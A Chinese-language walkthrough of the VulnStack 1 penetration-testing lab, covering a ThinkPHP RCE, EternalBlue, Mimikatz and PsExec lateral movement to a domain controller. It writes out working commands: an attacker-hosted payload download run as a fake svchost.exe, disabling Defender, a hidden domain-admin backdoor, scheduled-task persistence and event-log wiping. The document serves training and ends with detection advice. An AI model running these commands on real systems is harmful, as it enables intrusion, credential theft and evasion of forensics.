红日靶场 VulnStack 1 渗透路径解析:从 Web 到域控的 4 个关键攻击阶段
红日靶场 VulnStack 1 渗透实战从外网突破到域控提权的完整攻击链1. 靶场环境与攻击路径概览红日安全团队打造的VulnStack系列靶场已成为内网渗透学习的黄金标准。其中VulnStack 1模拟了典型企业网络架构一台暴露在公网的Web服务器Windows 7作为跳板机内网中存在域控制器Windows Server 2008和域成员服务器Windows Server 2003。这种外网DMZ内网域环境的拓扑结构真实还原了90%以上企业网络的部署方式。完整的攻击链可分为四个阶段外网信息收集通过端口扫描、目录爆破等手段定位Web应用漏洞初始突破利用ThinkPHP RCE漏洞获取Web服务器控制权横向移动以Web服务器为跳板通过MS17-010、PsExec等技术攻陷域控权限维持创建计划任务、服务等方式实现持久化控制# 典型网络拓扑 攻击机 Kali (192.168.150.128) │ ↓ Web服务器 Win7 (192.168.150.152[外网] 192.168.52.143[内网]) │ ├─ 域控 Win2008 (192.168.52.138) └─ 域成员 Win2003 (192.168.52.141)2. 外网突破ThinkPHP漏洞利用实战2.1 信息收集与漏洞定位使用Nmap进行全端口扫描是渗透测试的标准起手式。针对Web服务器我们需要特别关注80、443等常见Web端口nmap -sS -Pn -p- 192.168.150.152 --min-rate5000 nmap -sV -O -p80,3306 192.168.150.152扫描结果通常显示80端口运行ApachePHPStudy环境3306端口开放MySQL服务Web应用指纹识别显示ThinkPHP 5.0框架ThinkPHP历史上存在多个高危漏洞其中5.0.x版本的远程代码执行漏洞CVE-2018-20062是最具破坏性的突破口。该漏洞源于框架对控制器名的过滤不严导致攻击者可以直接调用任意类方法。2.2 RCE漏洞利用过程通过构造特殊URL触发漏洞执行系统命令http://192.168.150.152/index.php?s/Index/\think\app/invokefunction functioncall_user_func_array vars[0]system vars[1][]whoami实际渗透中常用更隐蔽的PowerShell下载执行方式certutil -urlcache -split -f http://攻击机IP/beacon.exe C:\Windows\Temp\svchost.exe start C:\Windows\Temp\svchost.exe注意真实环境中需先关闭Windows Defender实时防护可通过以下命令临时禁用powershell -c Set-MpPreference -DisableRealtimeMonitoring $true3. 内网横向移动技术解析3.1 权限提升与信息收集获取Web服务器shell后首先需要判断当前权限并收集内网信息systeminfo | findstr /B /C:OS Name /C:OS Version # 系统版本 whoami /priv # 当前权限 ipconfig /all # 网络配置 net view /domain # 域信息 arp -a # ARP缓存关键发现内网网段192.168.52.0/24域名称god.org域控主机名OWA (192.168.52.138)3.2 永恒之蓝攻陷域控内网扫描发现域控存在MS17-010漏洞时可采用以下攻击流程配置路由转发通过已控跳板机访问内网# MSF中添加路由 route add 192.168.52.0 255.255.255.0 [session_id]使用MSF模块攻击use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.52.138 set payload windows/x64/meterpreter/bind_tcp exploit获取域控权限后使用Mimikatz提取凭证load kiwi creds_all3.3 PsExec横向移动当获取到域管理员凭证后可通过PsExec快速控制其他主机PsExec64.exe \\192.168.52.141 -u god\administrator -p Admin12345 -s cmd.exe横向移动技术对比表技术手段适用场景优势风险点MS17-010未打补丁的Windows系统无需凭证可能造成系统蓝屏PsExec已获取高权限域凭证原生工具行为隐蔽会产生日志记录WMI远程执行防火墙放行135端口无文件落地需要管理员权限计划任务需要持久化控制可设置定时触发需配置任务路径4. 权限维持与痕迹清理4.1 创建隐藏用户在域控上添加隐蔽后门账户net user backup$ Admin123 /add /domain net group Domain Admins backup$ /add /domain4.2 计划任务持久化通过计划任务实现自启动schtasks /create /tn WindowsUpdate /tr C:\Windows\Temp\svchost.exe /sc onstart /ru SYSTEM4.3 日志清理技巧清除安全日志需要注意权限问题wevtutil cl security wevtutil cl system wevtutil cl application对于更彻底的痕迹清理可先停止日志服务net stop eventlog /y del /q /f %WINDIR%\System32\winevt\Logs\* net start eventlog5. 防御建议与攻击检测5.1 企业防护措施外网边界对ThinkPHP等框架保持版本更新WAF规则需包含常见RCE payload检测内网防护部署终端EDR解决方案监控PsExec、WMIExec等横向移动工具的使用域控加固启用LSA保护限制域管理员登录范围定期检查异常账户5.2 攻击检测指标日志分析关键点短时间内大量出现Event ID 4624登录类型3后接Event ID 4672特权登录安全日志中出现Event ID 4688新进程创建执行certutil、powershell等下载行为Sysmon日志中的PsExec父进程异常正常应来自sysinternals目录网络流量特征SMB协议中出现NTLM认证请求后接大量IPC$共享访问内网主机向未知IP发起反向连接Beacon心跳通信